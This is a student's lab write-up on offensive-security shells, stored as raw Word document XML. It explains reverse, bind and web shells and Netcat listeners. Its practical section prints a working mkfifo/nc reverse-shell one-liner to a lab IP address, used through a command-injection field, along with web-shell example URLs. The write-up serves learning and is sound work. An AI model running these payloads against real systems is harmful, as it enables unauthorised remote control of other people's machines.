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45100EF6" w:rsidR="001E67DF" w:rsidRDefault="000562BA">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>Shells Overview</w:t>
      </w:r>
      <w:r w:rsidR="000D1B55">
        <w:rPr>
          <w:b/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve"> -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4581F727" w:rsidR="001E67DF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="30" w:space="0" w:color="3498DB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F9FA"/>
        <w:spacing w:after="137"/>
        <w:ind w:left="295"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Date: </w:t>
      </w:r>
      <w:r w:rsidR="000562BA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r w:rsidR="00D10606">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/05/2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC84901" w14:textId="68569551" w:rsidR="001E67DF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="30" w:space="0" w:color="3498DB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F9FA"/>
        <w:spacing w:after="137"/>
        <w:ind w:left="295"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Difficulty: </w:t>
      </w:r>
      <w:r w:rsidR="000562BA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Easy </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A58055" w14:textId="5C77FF21" w:rsidR="001E67DF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="30" w:space="0" w:color="3498DB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F9FA"/>
        <w:spacing w:after="137"/>
        <w:ind w:left="295"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Category: </w:t>
      </w:r>
      <w:r w:rsidR="000562BA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Offensive security</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3322F157" w:rsidR="004F1182" w:rsidRPr="004F1182" w:rsidRDefault="004F1182" w:rsidP="004F1182">
      <w:r>
        <w:t xml:space="preserve">This lab </w:t>
      </w:r>
      <w:r w:rsidR="000562BA">
        <w:t xml:space="preserve">explores the different shells used in offensive security, the differences between them and how they are used in cyber security. </w:t>
      </w:r>
      <w:r w:rsidR="000D0610">
        <w:t xml:space="preserve">It explores reverse, bind and web shells in more detail and how they can be used including practical examples of how I utilised them to find flags. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF5186F" w14:textId="77777777" w:rsidR="001E67DF" w:rsidRDefault="00000000">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FCB7960" w14:textId="77777777" w:rsidR="001E67DF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>2. Toolset Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFC4006" w14:textId="77777777" w:rsidR="001E67DF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="308" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="-60" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24F44C4B" wp14:editId="4B1F8DD8">
                <wp:extent cx="6120000" cy="9525"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1637" name="Group 1637"/>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2" name="Shape 1872"/>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7" style="width:481.89pt;height:0.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="61200,95">
                <v:shape id="Shape 1873" style="position:absolute;width:61200;height:95;left:0;top:0;" coordsize="6120000,9525" path="m0,0l6120000,0l6120000,9525l0,9525l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#eeeeee"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9198" w:type="dxa"/>
        <w:tblInd w:w="8" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="158" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2398"/>
        <w:gridCol w:w="6800"/>
      </w:tblGrid>
      <w:tr w:rsidR="001E67DF" w14:paraId="5CB602E7" w14:textId="77777777" w:rsidTr="000D0610">
        <w:trPr>
          <w:trHeight w:val="699"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2398"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7311274" w14:textId="77777777" w:rsidR="001E67DF" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6800"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09DB1AD" w14:textId="77777777" w:rsidR="001E67DF" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Purpose / Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E67DF" w14:paraId="7C66F09D" w14:textId="77777777" w:rsidTr="000D0610">
        <w:trPr>
          <w:trHeight w:val="699"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2398" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D9A3594" w14:textId="3D0A8A92" w:rsidR="001E67DF" w:rsidRDefault="000D0610">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Netcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30064A8E" w14:textId="5CEE0155" w:rsidR="001E67DF" w:rsidRDefault="000D0610">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>A shell listener used to listen for connections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E6B5F57" w14:textId="77777777" w:rsidR="000D1B55" w:rsidRDefault="000D1B55">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="579AB56E" w14:textId="77777777" w:rsidR="00F96E69" w:rsidRDefault="00F96E69" w:rsidP="00F96E69"/>
    <w:p w14:paraId="5A1D4D0F" w14:textId="77777777" w:rsidR="00F96E69" w:rsidRDefault="00F96E69" w:rsidP="00F96E69"/>
    <w:p w14:paraId="038BEDE7" w14:textId="77777777" w:rsidR="00F96E69" w:rsidRPr="00F96E69" w:rsidRDefault="00F96E69" w:rsidP="00F96E69"/>
    <w:p w14:paraId="22431951" w14:textId="342FFA0A" w:rsidR="001E67DF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="000D1B55">
        <w:t xml:space="preserve">What </w:t>
      </w:r>
      <w:r w:rsidR="004F1182">
        <w:t>I did</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD6C678" w14:textId="77777777" w:rsidR="004F1182" w:rsidRDefault="004F1182" w:rsidP="004F1182"/>
    <w:p w14:paraId="2D48B053" w14:textId="4D825FEE" w:rsidR="002E668C" w:rsidRDefault="000562BA" w:rsidP="00A80858">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Shells are widely used by attackers to remotely control systems. A shell is software that allows a user to interact with an operating system. </w:t>
      </w:r>
      <w:r w:rsidR="004D019F">
        <w:t xml:space="preserve">In cyber security, they are typically used when accessing a compromised system to run commands and execute software. </w:t>
      </w:r>
      <w:r w:rsidR="00877616">
        <w:t xml:space="preserve">They can allow attackers to control a system remotely, escalate their privileges, steal data, maintain access and access other systems on the network. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E200C01" w14:textId="77777777" w:rsidR="00877616" w:rsidRDefault="00877616" w:rsidP="00A80858">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="300411E0" w14:textId="1D199D13" w:rsidR="00877616" w:rsidRDefault="00877616" w:rsidP="00A80858">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A reverse shell is a popular technique as it takes connections from the target machine to the attacker’s machine which helps avoid detection from firewalls or security devices. They work by </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">setting up </w:t>
      </w:r>
      <w:r w:rsidR="00BF1E00">
        <w:t>Netcat (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BF1E00">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BF1E00">
        <w:t>) as a listener (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BF1E00">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BF1E00">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BF1E00">
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BF1E00">
        <w:t xml:space="preserve"> 443). This uses Netcat in listening mode, verbose mode, -n prevents connections from using DNS lookups and the -p flag indicates the port that will be used to wait for the connection. Once the listener is set up, the attacker executes a reverse shell payload which exploits the vulnerability and executes a command to expose the shell through the network. Once the payload is executed, the attacker receives a reverse shell, and they can execute commands in the terminal. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9C1F40" w14:textId="77777777" w:rsidR="00BF1E00" w:rsidRDefault="00BF1E00" w:rsidP="00A80858">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61B9A4EC" w14:textId="0B666C37" w:rsidR="00BF1E00" w:rsidRDefault="00BF1E00" w:rsidP="00A80858">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A bind shell binds a port on the compromised system and listens for a connection. When the connection occurs, it exposes the shell session so the attacker can execute commands remotely. This can be used when the compromised target does not allow outgoing connections, but it can lead to easier detection due to the need for it to remain active and listening. Ports below 1024 require Netcat to be executed with elevated privileges so it’s better to use ports higher than this. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F9B868" w14:textId="77777777" w:rsidR="00BF1E00" w:rsidRDefault="00BF1E00" w:rsidP="00A80858">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24B10CB7" w14:textId="2CD67C07" w:rsidR="002E668C" w:rsidRDefault="00BF1E00" w:rsidP="00E907B5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Netcat is not the only shell listener available </w:t>
      </w:r>
      <w:r w:rsidR="00E907B5">
        <w:t xml:space="preserve">for this task. Other tools/utilities are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E907B5">
        <w:t>Rlwrap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E907B5">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E907B5">
        <w:t>Ncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E907B5">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E907B5">
        <w:t>Socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E907B5">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E907B5">
        <w:t>Rlwrap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E907B5">
        <w:t xml:space="preserve"> is a small utility that uses a library to edit keyboard and history. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E907B5">
        <w:t>Ncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E907B5">
        <w:t xml:space="preserve"> is an improved version of Netcat and has extra features like encryption. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E907B5">
        <w:t>Socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E907B5">
        <w:t xml:space="preserve"> allows you to create a socket connection between 2 data sources or hosts. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110BAD9B" w14:textId="77777777" w:rsidR="00E907B5" w:rsidRDefault="00E907B5" w:rsidP="00E907B5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FD6E3DD" w14:textId="031BE932" w:rsidR="00E907B5" w:rsidRDefault="00E907B5" w:rsidP="00E907B5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A shell payload is a command or script that exposes the shell to an incoming connection in the case of a bind shell or send connection for a reverse shell. Bash, PHP, Python and others can be used to create and run payloads. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A21AEB" w14:textId="77777777" w:rsidR="00E907B5" w:rsidRDefault="00E907B5" w:rsidP="00E907B5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A7A3355" w14:textId="26418E52" w:rsidR="009667DA" w:rsidRDefault="00E907B5" w:rsidP="009667DA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>A web shell is a script written in a language which is supported by a compromised web server to execute commands through the web server itself. These can be hidden in web applications or services so that it is difficult to detect.</w:t>
      </w:r>
      <w:r w:rsidR="009667DA">
        <w:t xml:space="preserve"> They can be uploaded if the website has unrestricted file upload vulnerabilities.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> It can be written in several languages such as PHP, ASP, JSP or even simple CGI scripts. Once the shell is deployed in the server, you can access it through the URL such as </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00730549">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://victim.com/uploads/shell.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009667DA">
        <w:t xml:space="preserve">You can then exploit the web application using command injection such as </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="009667DA" w:rsidRPr="00C34045">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://victim.com/uploads/shell.php?cmd=whoami</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009667DA">
        <w:t xml:space="preserve"> to display the result in the web browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0F5AF3" w14:textId="77777777" w:rsidR="009667DA" w:rsidRDefault="009667DA" w:rsidP="009667DA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E3EB4B9" w14:textId="252853D9" w:rsidR="009667DA" w:rsidRPr="009667DA" w:rsidRDefault="009667DA" w:rsidP="009667DA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009667DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF3AFFE" w14:textId="3D103E63" w:rsidR="00E907B5" w:rsidRDefault="00E907B5" w:rsidP="00E907B5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BA43FAF" w14:textId="5E7BECBA" w:rsidR="002E668C" w:rsidRDefault="009667DA" w:rsidP="004F1182">
      <w:r>
        <w:t xml:space="preserve">The first task is to use a reverse or bind shell to exploit the command injection vulnerability to get a shell. </w:t>
      </w:r>
      <w:r w:rsidR="00E82030">
        <w:t>The first thing is to set up Netcat to listen to port 443.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722BC99F" w14:textId="77777777" w:rsidR="009667DA" w:rsidRDefault="009667DA" w:rsidP="004F1182"/>
    <w:p w14:paraId="5BE701DB" w14:textId="1E26E38D" w:rsidR="009667DA" w:rsidRDefault="00F62E28" w:rsidP="004F1182">
      <w:r w:rsidRPr="00F62E28">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54F4525E" wp14:editId="5AFF05BF">
            <wp:extent cx="3124200" cy="433334"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="20719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0363" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3136918" cy="435098"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48277024" w14:textId="77777777" w:rsidR="00F62E28" w:rsidRDefault="00F62E28" w:rsidP="004F1182"/>
    <w:p w14:paraId="444DB5AC" w14:textId="606C656E" w:rsidR="00E82030" w:rsidRDefault="00E82030" w:rsidP="004F1182">
      <w:r>
        <w:t xml:space="preserve">The next task was to use the following command in the text box </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16643519" w14:textId="77777777" w:rsidR="00F62E28" w:rsidRDefault="00F62E28" w:rsidP="004F1182"/>
    <w:p w14:paraId="54DB5E19" w14:textId="52D1DEFF" w:rsidR="00676E2C" w:rsidRDefault="00E82030" w:rsidP="004F1182">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82030">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E82030">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>rm</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E82030">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -f /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E82030">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E82030">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">/f; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E82030">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>mkfifo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E82030">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E82030">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E82030">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/f; cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E82030">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E82030">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">/f | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E82030">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E82030">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E82030">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E82030">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2&gt;&amp;1 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E82030">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E82030">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E82030">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>10.81.92.64</w:t>
      </w:r>
      <w:r w:rsidRPr="00E82030">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E82030">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>443</w:t>
      </w:r>
      <w:r w:rsidRPr="00E82030">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E82030">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E82030">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/f</w:t>
      </w:r>
      <w:r w:rsidRPr="00E82030">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F027559" w14:textId="77777777" w:rsidR="00975411" w:rsidRDefault="00975411" w:rsidP="004F1182">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E5B703E" w14:textId="3AA0B0AB" w:rsidR="00975411" w:rsidRDefault="00975411" w:rsidP="004F1182">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00975411">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41A6568E" wp14:editId="0B47F090">
            <wp:extent cx="4541520" cy="905641"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="208475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55554" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4544243" cy="906184"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1510AF57" w14:textId="77777777" w:rsidR="00975411" w:rsidRDefault="00975411" w:rsidP="004F1182">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35F9F6CE" w14:textId="6E13A350" w:rsidR="00975411" w:rsidRDefault="00975411" w:rsidP="004F1182">
      <w:r>
        <w:t xml:space="preserve">Now the connection was made and on the listening </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, we could navigate around the files and view them.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643D635B" w14:textId="77777777" w:rsidR="00975411" w:rsidRDefault="00975411" w:rsidP="004F1182"/>
    <w:p w14:paraId="47771998" w14:textId="1F40F1EB" w:rsidR="00975411" w:rsidRPr="00975411" w:rsidRDefault="00975411" w:rsidP="004F1182">
      <w:r w:rsidRPr="00975411">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="198D8410" wp14:editId="502A5510">
            <wp:extent cx="3299460" cy="1801546"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="152850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08429" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3307216" cy="1805781"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
